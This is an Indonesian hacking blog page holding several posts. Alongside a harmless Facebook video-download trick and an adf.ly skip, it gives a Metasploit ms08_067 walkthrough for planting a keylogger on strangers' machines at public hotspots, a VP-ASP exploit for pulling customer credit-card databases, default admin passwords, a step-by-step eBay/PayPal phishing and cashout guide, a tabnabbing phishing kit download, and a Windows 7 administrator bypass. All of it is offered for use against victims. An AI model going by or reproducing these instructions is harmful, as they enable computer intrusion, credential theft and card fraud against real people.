Flickr Photostream

Thundercats Animated Pointer

Stats

Diberdayakan oleh Blogger.

Popular Posts

bloguez.com ">See all Movies'); document.write('

bloguez.com ?max-results=8">Movie Category 5

'); document.write(" bloguez.com ?max-results="+numposts2+"&orderby=published&alt=json-in-script&callback=showrecentposts1\"><\/script>");

Sabtu, 27 Agustus 2011

Cara Manual Download Video Di Facebook Tanpa Menggunakan Software

Silakan klik link video Facebook di bawah ini [ contoh ] :
http://www.facebook.com/video/video.php?v=1199043181877&oid=60811926300

Kemudian lihat "page source" dengan menekan tekan tombol [CTRL]+[U]

Pada halaman "source code", lakukan pencarian dengan tombol [CTRL]+[F]

Ketikkan : "video_src" dan tekan tombol [ENTER]

Kalian akan mendapatkan code seperti ini :
Code:

"video_src", "http\u00253A\u00252F\u00252Fvideo.ak.fbcdn.net\u00252Fcfs-ak-snc6\u00252F81933\u00252F68\u00252F1199043181877_24774.mp4\u00253Foh\u00253De4803f82b64885c8a493d552ab3973df\u002526oe\u00253D4DBE8500\u002526__gda__\u00253D1304331520_ad40961c55d79034df0adb50562c8a99"


Yang kita perlukan sekarang hanya pada bagian berikut :
Code:

http\u00253A\u00252F\u00252Fvideo.ak.fbcdn.net\u00252Fcfs-ak-snc6\u00252F81933\u00252F68\u00252F1199043181877_24774.mp4\u00253Foh\u00253De4803f82b64885c8a493d552ab3973df\u002526oe\u00253D4DBE8500\u002526__gda__\u00253D1304331520_ad40961c55d79034df0adb50562c8a99


Pada browser Mozilla, buka Tab baru dengan tombol [CTRL]+[T]

Tempelkan pada Address Bar code JavaScript berikut :
Code:

javascript:alert(unescape('URL PADA SOURCE CODE'))


Pada percobaan kali ini akan menjadi seperti ini :
Code:

javascript:alert(unescape('http\u00253A\u00252F\u00252Fvideo.ak.fbcdn.net\u00252Fcfs-ak-snc6\u00252F81933\u00252F68\u00252F1199043181877_24774.mp4\u00253Foh\u00253D5ed38beba1ffe4f6445b5c7bfad6a2ed\u002526oe\u00253D4DBE8100\u002526__gda__\u00253D1304330496_f0b2e40e6a87817497744bd4f5605fc4'))


Lalu tekan tombol [ENTER]

Akan muncul sebuah "popup"

img

yang menampilkan link download video Facebook tadi


Copy Paste link di atas pada Tab baru untuk di download

img
Publisher: Reynaldy GunKz Vins - 03.01

Memasang Keylogger Tanpa Menyentuh Komputer Korban



OK deh langsung aja, tanpa basa basi..

Peralatannya adalah :

Angry IP Scanner (Buat scanning ipaddress)

Nmap (Buat nyecan Port2 yg kebuka n nyecen OS korban sekalian)

Metasploit (Sangat penting buat exploitnya)

1. Pertama buka angryipscanner, pilih netmasknya yg 24 ajee,,pokoknya disesuain aja sama lokasinya dimana,,hahhaha,,kalo sekedar hostpot area area doang yg model model kayak di mol mol mah 24 ajeee...lalu liat ipaddress kita dilaptop kita..dan lakukan scanning dari 0 s/d 255, maka akan muncul gambar kayak gini :




nah gambar diatas itu yg warna biru berati komputernya lagi idup alias lagi nyala.

2. Buka nmap dan lakukan scanning port dan OS korban dengan perintah sudo nmap -O ipkorban, seperti gambar berikut:



liat deh ituhh,,ternyata doi pake windows XP,,hehhehe,,hajar bleeeehhhhhh....sampe keakar2nya bikin intall ulang dalem hitungan detik...Ouuppppsss jangan dungggsss, kan ini tutorialnya tentang ngerekam keyboard buat dapetin password,,hhehheh,,,Oiya yaaaa...lanjuttt blleeehhh..

3. Mulailah exploit, buka applikasinya msfgui,,tekan keyboard Alt+F2 dan ketik ?msfgui? setelah kebuka dan Start, pilih ?ms08_067_netapi? di Exploit>windows>smb> , seperti gambar berikut ini:



4. Maka akan keluar jendela pilihan OS targetnya, pilihlah ?Automatic Targeting?, seperti gambar berikut ini:



5. Lalu scrool kebawah dan pilih ?Meterpreter>bind_tcp? , seperti gambar berikut ini:



6. Lalu scrool kebawah lagi dan masukan ipaddress target di kolom ?RHOST? , seperti gambar berikut ini:



Lalu scrool ke paling bawah ada tombol, Exploit, tekan aja ituh,,,

7. Maka akan keluar jendela seperti ini di tab ?Session?, seperti gambar dibawah ini:



8. Lalu klik kanan itu dan pilih Monitor>Start KeyLogger, seperti gambar dibawah ini:



9. Maka akan keluar path tempat penyimpanan log nya berupa format ?txt? dikomputer kita, seperti gambar berikut ini:



coba perhatikan yg Keystrokes being saved to bla bla bla,,itu adalah nama path lokasi penyimpanan lognya dikomputer pinguin kita. dan liat bacaan Recording,,itu berati ketukan keyboard korban sudah mulai di rekam oleh metasploit kita..hhehehe..Saatnya kita tungguin ajaaa dah,,setelah lama, kita tunggu, n udah gak sabar, setelah beberapa menit kita buka ajjeee tuh filenya, seperti gambar berikut ini:



10. Udah gak sabar nih, langsung aja buka,,lalu lakukan searching dengan menekan tombol Ctrl+F dengan memasukkan kata2 kunci yg biasanya bau bau enak, seperti yahoo.com, yahoo.co.id, gmail.com , ymail.com, com, dll, maka akan keluar Insya Allah kayak gini broo:



OK kelar deh,,ya kan bener kan gak perlu mondar mandir nyentuh komputer korbannya buat ngedapetin sesuatu yg ente mau,,,hhhwhwhhw,,pake metasploit lebih sloooowww,,sambil ngopi+ngeroko filter juga OK,,gak perlu tergesah gesah dengan tampang pucat mbrunyammm,,,hwhhhwh,,,OK lah kalo bgitu ane pamitan dulu, n tunggu exploit-exploit berikutnya dari si logo PINGUIN....

Source : http://www.facebook.com/notes/andi-susilo/merekam-ketukan-keyboard-target-tanpa-menyentuh-komputernyakeylogger-canggih/168560876509539
Publisher: Reynaldy GunKz Vins - 03.00

HOW TO HACK A CREDIT CARD NUMBER | CREDIT CARD HACKS | VISA CARD HACKS|CREDIT CARD PASSWORD HACKING

Hi there. This is my first serious "Black Hat Hacking" post of credit cards hacking. Here will be explained all methods used to hack credit cards and bank accounts with lots of $ it. Now I?m sure most of you think that this is fake or scam, but i want to just tell u this is real and the only working method (in my opinion) to hack a credit card and make your wish come true (lol, hope it doesn't sound like a commercial).[hackinghome.com]
This tutorial is divided in two parts.
  1. Introduction into Credit Cards
  2. Credit card Hacking

Note: Hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial. This post is for educational purposes only.  Lets start with some easy terms.
What is credit card ?
Credit cards are of two types:

  • Debit Card
  • Credit Card
1. Debit means u have a sum of amount in it and u can use them.
2. Credit means u have a credit line limit like of $10000 and you can use them and by the end of month pay it to bank.
To use a credit card on internet u just not need cc number and expiry but u need many info like :
  • First name
  • Last name
  • Address
  • City
  • State
  • Zip
  • Country
  • Phone
  • CC number
  • Expiry
  • CVV2 ( this is 3digit security code on backside after signature panel )
If you get that info you can use that to buy any thing on internet, like software license, porn site membership, proxy membership, or any thing (online services usually, like webhosting, domains).
If u want to make money $ through hacking then you need to be very lucky? you need to have a exact bank and bin to cash that credit card through ATM machines.
Let me explain how ?
First study some simple terms.
BINS = first 6 digit of every credit card is called "BIN" (for example cc number is : 4121638430101157 then its bin is "412163"), i hope this is easy to understand.
Now the question is how to make money through credit cards. Its strange?, well you cant do that, but there is specific persons in world who can do that. They call them selves "cashiers". You can take some time to find a reliable cashiers.
Now the question is every bank credit cards are cashable and every bin is cashable? Like Citibank, Bank of America , Mbna .. are all banks are cashables ? Well answer is "NO". If u know some thing, a little thing about banking system, have u ever heard what is ATM machines? Where u withdraw ur cash by putting ur card in.
Every bank don't have ATM, every bank don't support ATM machines cashout. Only few banks support with their few bins (as u know bin is first 6 digit of any credit / debit card number), for suppose bank of america. That bank not have only 1 bin, that bank is assigned like, 412345 412370 are ur bins u can make credit cards on them. So bank divide the country citi location wise, like from 412345 ? 412360 is for americans, after that for outsiders and like this. I hope u understand. So all bins of the same bank are even not cashable, like for suppose they support ATM in New York and not in California, so like the bins of California of same bank will be uncashable. So always make sure that the bins and banks are 100% cashable in market by many cashiers.
Be sure cashiers are legit, because many cashiers r there which take your credit card and rip u off and don't send your 50% share back.
You can also find some cashiers on mIRC *( /server irc.unixirc.net:6667 ) channel : #cashout, #ccpower
Well, check the website where u have list of bins and banks mostly 101% cashable. If u get the credit card of the same bank with same bin, then u can cashout otherwise not . Remember for using credit card on internet u don't need PIN ( 4 words password which u enter in ATM Machine ), but for cashout u need. You can get pins only by 2nd method of hacking which i still not post but i will. First method of sql injection and shopadmin hacking don't provide with pins, it only give cc numb cvv2 and other info which usually need for shopping not for cashing.
Credit Card Hacking
CC (Credit Cards) can be hacked by two ways:
  • Credit Card Scams ( usually used for earning money , some times for shopping )
  • Credit Card Shopadmin Hacking ( just for fun, knowledge, shopping on internet )
1. Shopadmin Hacking
This method is used for testing the knowledge or for getting the credit card for shopping on internet, or for fun, or any way but not for cashing ( because this method don?t give PIN - 4 digit passcode ) only gives cc numb , cvv2 and other basic info.
Shopadmins are of different companies, like: VP-ASP , X CART, etc. This tutorial is for hacking VP-ASP SHOP.
I hope u seen whenever u try to buy some thing on internet with cc, they show u a well programmed form, very secure. They are carts, like vp-asp xcarts. Specific sites are not hacked, but carts are hacked.
Below I?m posting tutorial to hack VP ASP cart. Now every site which use that cart can be hacked, and through their *mdb file u can get their clients "credit card details", and also login name and password of their admin area, and all other info of clients and comapny secrets.
Lets start:
Type: VP-ASP Shopping Cart
Version: 5.00
How to find VP-ASP 5.00 sites?
Finding VP-ASP 5.00 sites is so simple?
1. Go to google.com and type: VP-ASP Shopping Cart 5.00
2. You will find many websites with VP-ASP 5.00 cart software installed
Now let's go to the exploit..
The page will be like this: ****://***.victim.com/shop/shopdisplaycategories.asp
The exploit is: diag_dbtest.asp
Now you need to do this: ****://***.victim.com/shop/diag_dbtest.asp
A page will appear contain those:
  • xDatabase
  • shopping140
  • xDblocation
  • resx
  • xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumber
Example:
The most important thing here is xDatabase
xDatabase: shopping140
Ok, now the URL will be like this: ****://***.victim.com/shop/shopping140.mdb
If you didn?t download the Database, try this while there is dblocation:
xDblocation
resx
the url will be: ****://***.victim.com/shop/resx/shopping140.mdb
If u see the error message you have to try this :
****://***.victim.com/shop/shopping500.mdb
Download the mdb file and you should be able to open it with any mdb file viewer, you should be able to find one at download.com, or use MS Office Access.

Inside you should be able to find credit card information, and you should even be able to find the admin username and password for the website.
The admin login page is usually located here: ****://***.victim.com/shop/shopadmin.asp
If you cannot find the admin username and password in the mdb file or you can but it is incorrect, or you cannot find the mdb file at all, then try to find the admin login page and enter the default passwords which are:
Username: admin
password: admin
OR
Username: vpasp
password: vpasp
2. Hacking Through Scams
This method is usually used to hack for earning money. What happens in this method is you create a clone page.
Target: its basically eBay.com or paypal.com for general credit cards, or if u want to target any specific cashable bank like regionbank.com then u have to create a clone page for that bank.
What is eBay.com?
Its a shopping site world wide which is used by many of billion people which use their credit cards on ebay. What you do make a similar page same as eBay and upload it on some hosting which don?t have any law restrictions, try to find hosting in Europe they will make your scam up for long time, and email the users of eBay.
How to get the emails of their users?
Go to google.com and type "Email Harvestor" or any Email Spider and search for eBay Buyers and eBay Sellers and u will get long list. That list is not accurate but out of 1000 atleast 1 email would be valid. Atleast you will get some time.
Well u create a clone page of ebay, and mail the list u create from spider with message, like "Your account has been hacked" or any reason that looks professional, and ask them to visit the link below and enter your info billing, and the scam page have programming when they enter their info it comes directly to your email.
In the form page u have PIN required so u also get the PIN number through which u can cash through ATM ..
Now if u run ebay scam or paypal scam, its up to your luck who's your victim. A client of bank of america or of citibank or of region, its about luck, maybe u get cashable, may be u don't its just luck, nothing else.
Search on google to download a scam site and study it !
After you create your scam site, just find some email harvestor or spider from internet (download good one at Bulk Email Software Superstore - Email Marketing Internet Advertising) and create a good email list.
And you need to find a mailer (mass sending mailer) which send mass - emails to all emails with the message of updating their account on ur scam page ). In from to, use email eBay@reply3.ebay.com and in subject use : eBay - Update Your eBay Account and in Name use eBay
Some Instructions:
1. Make sure your hosting remains up or the link in the email u will send, and when your victim emails visit it, it will show page cannot be displayed, and your plan will be failed.
2. Hardest point is to find hosting which remains up in scam. even i don?t find it easily, its very very hard part.
3. Maybe u have contacts with someone who own hosting company and co locations or dedicated he can hide your scam in some of dedicated without restrictions.
4. Finding a good email list (good means = actually users)
5. Your mass mailing software land the emails in inbox of users.
That's all Readers. Hope you will find this tutorial useful. And remember, hacking credit cards is an illegal act, this is only informational post and I am not responsible for any actions done by you after reading this tutorial.
Publisher: Reynaldy GunKz Vins - 02.59

Tehnik Phising Baru (Tabnabbing Tutorial By Bluff Master Hacker)


Tabnabbing berfungsi untuk mempermanis phisingan anda, bekerja untuk lingkungan multitab browser (ex: mozilla, google chrome, dll)

Jika anda pernah memakai atau menggunakan phising untuk mengelabui korban-korban anda, maka thread ini sebagai pemanis dari phisingan anda.

Ide ini berawal dari pemikiran yang sederhana menggunakan multi tab untuk mengecoh korban anda dan dilakukan oleh javascript. Tabnabbing ini sebenernnya ialah penghubung dari 2 halaman.

Anggaplah Ada dua halam halaman A dan Halaman B. Kita memberikan halaman A ke pada Korban, lalu korban melihat halaman A dalam tab browser dan kemudian saat ia lengah (tak sadar), korban meninggalkan tab halaman A tersebut untuk melihat tab - tab yang lain (beberapa website lain) di browser.

Apabila si korban tidak akan kembali ke halaman A untuk beberapa waktu yang di tentukan, maka otomatis halaman A akan ter-redirect ke halaman B dan Halaman B ini ialah phishingan Anda. redirect ini akan dirubah otomatis oleh sebuah Javascript.

Anda dapat men-download alat yang dibutuhkan.

file:
- php/html palsu ==> ini adalah halaman A (ex: situs-situs deface atau situs yg sengaja anda buat untuk jebakan) dalam hal ini saya mendemokan menggunakan fake google

- php/html phisingan anda ==> ini adalah halaman B (ex: http://hostingan-anda.com/fakebook.php )

- filejavascript.js ==> fungsi meredirect dari halaman A ke halaman B (ada didalam file download yg akan di beri)

- injectingc0de.txt => fungsi untuk memanggil filejavascript.js [color=red](ada didalam file download yg akan di beri)

DOWNLOAD : http://www.mediafire.com/download.php?ww8v6dblb9q8231

MIRROR : http://v5.indowebster.com//tabnabing_by_bluff_master_hacker.html
Publisher: Reynaldy GunKz Vins - 02.58

Cara Mudah Login Ke Windows 7 Sebagai Administrator

Pada versi sebelumnya, windows XP mudah dimasuki oleh para pengguna yang tidak mengetahui password user yang ada, sehingga orang yang tidak mengetahui passwordnya akan memasuki akun administrator. Tetapi pada versi windows 7 akun administrator secara default di hidden oleh system sehingga pengguna awam yang tidak tahu password tidak dapat memasuki akun. Oleh sebab itu, ada cara yang bisa di coba untuk masuk ke windows 7 administrator dengan cara dibawah ini.
Caranya sebagai berikut :
1. Sebelum windows ter-boot tekan F8
2. Lalu pilih Repair your computer
3. Setelah sudah tampil interface dari Jendela Repair Your Computer, klik Open Command Prompt,
4. Lalu tulis ” net user administrator /active:yes”
5. Setelah ada pesan the command active successfully
6. Lalu tulis ” net user administrator password anda ” ganti kata password anda sesuai keinginan,
7. Lalu tutup command prompt
8. Klik restart komputer
Semoga Bermanfaat :)
Jangan lupa untuk berkumpul di Forum BinusHacker: http://forum.binushacker.net
Publisher: Reynaldy GunKz Vins - 02.55

Melewati Link Download Gratis Tanpa Harus Menunggu

Pasti sudah pada tau kan tempat - tempat download gratis ? Kalau yang belum tau mending cari tau dulu sana.. dari pada ntar ke bingungan...hehehehe
Tenang bin ajaib, jadi adf.ly adalah sebuah link dimana untuk menuju ke link tujuan, biasanya banyak para blogger memberikan link adf.ly terlebih dahulu,dan kita harus menunggu 5 Detik..
Kalau link nya 1 ndak apa2 lah...kalau linknya ada 20 Gimana??? capek kan???
Nah,Jadi ada caranya nih...




1. Masuk Ke Situs Ini → http://hoangmanhhiep.info/adf/

2. Paste Link "adf.ly" yang akan kita lewati didalam kolom yang berwarna putih, dan klik "Get Link"
3. Tunggu beberapa detik dan Keluar deh Hasilnya...

Khusus untuk rapidshare.com, megaupload.com, hotfile.com, fileserve.com, filefactory.com, depositfiles.com, filesonic.com, netload.in, uploading.com, easy-share.com, uploaded.to, mediafire.com, megashares.com, gigasize.com, bitshare.com, oron.com, gigasize.com, uploadstation.com, megavideo.com teman - teman bisa langusung menuju ke http://vinaleech.com/linkchecker/
Publisher: Reynaldy GunKz Vins - 02.54